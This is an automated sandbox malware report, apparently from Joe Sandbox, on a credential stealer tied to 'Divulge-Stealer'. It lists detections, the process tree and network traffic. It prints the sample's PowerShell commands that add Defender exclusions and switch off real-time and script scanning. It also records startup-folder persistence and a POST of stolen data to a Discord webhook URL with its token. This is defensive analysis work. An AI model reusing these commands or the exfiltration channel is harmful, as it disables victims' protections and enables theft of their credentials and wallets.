
Windows Analysis Report
apDMcnqqWs.exe

Overview

General Information

Sample name: apDMcnqqWs.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: 1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
Analysis ID: 1572913
MD5: e09f55d421cb45340a8c97c217ba56cf
SHA1: 2280afe7bb2d07c315e2599c21f069dd1b7ce3b8
SHA256: 1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • apDMcnqqWs.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\apDMcnqqWs.exe" MD5: E09F55D421CB45340A8C97C217BA56CF)
    • dllhost.exe (PID: 3708 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • powershell.exe (PID: 6032 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7028 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3708 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6488 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 516 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6484 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 416 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 612 cmdline: "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
apDMcnqqWs.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: apDMcnqqWs.exe PID: 6924 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.0.apDMcnqqWs.exe.1ed082d0000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', ProcessId: 6032, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7028, ProcessName: powershell.exe
Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 3708, StartAddress: B28432B0, TargetImage: C:\Windows\System32\dllhost.exe, TargetProcessId: 3708
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', ProcessId: 6032, ProcessName: powershell.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\apDMcnqqWs.exe, ProcessId: 6924, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4z5ru.scr
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\apDMcnqqWs.exe", ParentImage: C:\Users\user\Desktop\apDMcnqqWs.exe, ParentProcessId: 6924, ParentProcessName: apDMcnqqWs.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe', ProcessId: 6032, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: apDMcnqqWs.exe; Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr; Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr; ReversingLabs: Detection: 87%
Source: apDMcnqqWs.exe; ReversingLabs: Detection: 87%
Source: apDMcnqqWs.exe; Virustotal: Detection: 78%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr; Joe Sandbox ML: detected
Source: apDMcnqqWs.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\apDMcnqqWs.exe; Code function: 0_2_00007FFD34A42B43 CryptUnprotectData, 0_2_00007FFD34A42B43
Source: apDMcnqqWs.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49787 version: TLS 1.2
Source: apDMcnqqWs.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global traffic; HTTP traffic detected:
    GET /json/?fields=225545 HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
    GET /json/?fields=225545 HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: discord.com
Source: unknown; HTTP traffic detected:
    POST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1
    Accept: application/json
    User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 886
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 11 Dec 2024 07:40:16 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: close
    Cache-Control: public, max-age=3600, s-maxage=3600
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1733902817
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bamIwy83ZFT7y2v3CKu9aewld%2Bvk5ZsQZMYbwR82q9hjVS489nN5myUfGMi6m8s7NR0k3L2GBtHyahxHFoQMCpCskvCplEM5q4aEfLPag2PuRkRIG9qGb%2F2lMrBf"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Set-Cookie: __cfruid=6c81c4fbb7ebff5ead0ba6483805c69b9b6a88d7-1733902816; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: _cfuvid=S3vmSPcTE6BGxcUZYj7Q0aQm8HDzs9bcDml18siBgC0-1733902816347-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8f03d3583d1b15a3-EWR

    {"message": "Unknown Webhook", "code": 10015}
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 11 Dec 2024 07:40:19 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: close
    Cache-Control: public, max-age=3600, s-maxage=3600
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1733902820
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Np5VDrvgrqvDRLxUx6%2BKmWV7%2FaPoUpfZCt6ORwhF4SyjuL8As8OIff8C5J7pYUXbLXdqDWBTdHrDCxISPv%2BxTAt47grRwFy5fZag0kYFnp5J78ATW8w%2Bzj4TZsNM"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Server: cloudflare
    CF-RAY: 8f03d3647b820f71-EWR

    {"message": "Unknown Webhook", "code": 10015}
Source: powershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micft.cMicRosof
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://discord.com
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: apDMcnqqWs.exe, 4z5ru.scr.0.dr; String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/json/?fields=225545P
Source: apDMcnqqWs.exe, 4z5ru.scr.0.dr; String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2197486995.000002017538F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://discord.com
Source: 4z5ru.scr.0.dr; String found in binary or memory: https://discord.com/api/v10/users/
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8Ts
Source: apDMcnqqWs.exe, 4z5ru.scr.0.dr; String found in binary or memory: https://discordapp.com/api/v9/users/
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/:
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/J
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/presentation/:
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/presentation/J
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrom
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/:
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/?lfhs=2
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/J
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: 4z5ru.scr.0.dr; String found in binary or memory: https://github.com/PyDevOG/Divulge-Stealer
